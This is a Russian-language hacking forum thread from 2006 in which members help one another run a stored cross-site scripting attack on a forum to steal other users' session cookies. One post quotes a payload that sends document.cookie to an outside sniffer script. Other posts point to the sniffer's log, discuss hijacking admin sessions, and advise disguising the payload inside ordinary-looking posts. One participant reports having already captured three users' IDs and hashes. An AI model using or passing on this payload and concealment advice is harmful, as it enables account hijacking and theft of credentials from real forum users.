HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 03.01.2006, 16:25
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
С нами: 10798886

Репутация: 523


По умолчанию

` - это символ обратного апострофа, он является ограничителем атрибутов, но только в IE.
 
Ответить с цитированием

  #2  
Старый 03.01.2006, 17:26
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами: 11058146

Репутация: 4536


По умолчанию

Цитата:
но всё ровно не могу зайти под админом,
там в админке можно включать привязку сессии к ипу и браузеру. по умолчанию привязка только к ипу, насколько я помню.
 
Ответить с цитированием

  #3  
Старый 05.01.2006, 18:07
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
С нами: 10953146

Репутация: 11
По умолчанию

Эээ...да тебе вообще ничего не надо заменять )))) тебе просто код Джордана надо фтыкнуть и все а далее смотри на логе сниффера, который указал, в коде Джордана это - http://antichat.ru/sniff/log.php и ищи свои данные (только сначала удостоверься, пашет ли вообще код )
 
Ответить с цитированием

  #4  
Старый 05.01.2006, 18:54
Kragen
Новичок
Регистрация: 03.01.2006
Сообщений: 17
С нами: 10710738

Репутация: 0
По умолчанию

Здесь еще одна проблема...
Когда ставлю етот код, то в IE все норм, тоесть в сообщении ничего не отображается, НО в Opera отображается такое:
.com'>wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

Можно ли ето как-нить убрать?
 
Ответить с цитированием

  #5  
Старый 05.01.2006, 18:59
Kragen
Новичок
Регистрация: 03.01.2006
Сообщений: 17
С нами: 10710738

Репутация: 0
По умолчанию

З.Ы. Код нормально пашет ))
 
Ответить с цитированием

  #6  
Старый 05.01.2006, 19:06
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
С нами: 10953146

Репутация: 11
По умолчанию

Цитата:
Сообщение от Kragen  
З.Ы. Код нормально пашет ))
Если бы он работал, тогда бы это не писалось, значит маскируй цветом или размерами....
 
Ответить с цитированием

  #7  
Старый 05.01.2006, 19:00
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
С нами: 10845026

Репутация: 212
По умолчанию

тока в осле работает!
 
Ответить с цитированием

  #8  
Старый 05.01.2006, 19:11
Kragen
Новичок
Регистрация: 03.01.2006
Сообщений: 17
С нами: 10710738

Репутация: 0
По умолчанию

ОК, попробую, но код пашет, т.к. в ИЕ не отображается и на снифер пришло уже 3 ИД с хешами....
Еще вопрос... Можно-ли как-то добавить в пост с кодом, что-бы пост был не пустой, а там что-то отображалось? Я пробовал записять в начало, не получилось....
 
Ответить с цитированием

  #9  
Старый 05.01.2006, 19:14
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
С нами: 10953146

Репутация: 11
По умолчанию

Ну дак просто вставляешь скрипт, например:
[script] а потом текст!
и все - идет типо скрипт и текст, скрипт не видно а текст видно, мол ты просто запостил и все
 
Ответить с цитированием

  #10  
Старый 05.01.2006, 19:20
Kragen
Новичок
Регистрация: 03.01.2006
Сообщений: 17
С нами: 10710738

Репутация: 0
По умолчанию

=) Щас попробуем...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос. dukalis(AwP) Уязвимости CMS / форумов 14 19.04.2006 19:40
Вопрос про уязвимости в ExBB 1.9 cardons Уязвимости CMS / форумов 10 30.01.2006 23:57
Вопрос про уязвимости в FastBB deo Уязвимости CMS / форумов 9 29.11.2004 09:47
Вопрос про уязвимости в exbb Уязвимости CMS / форумов 1 02.08.2004 19:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.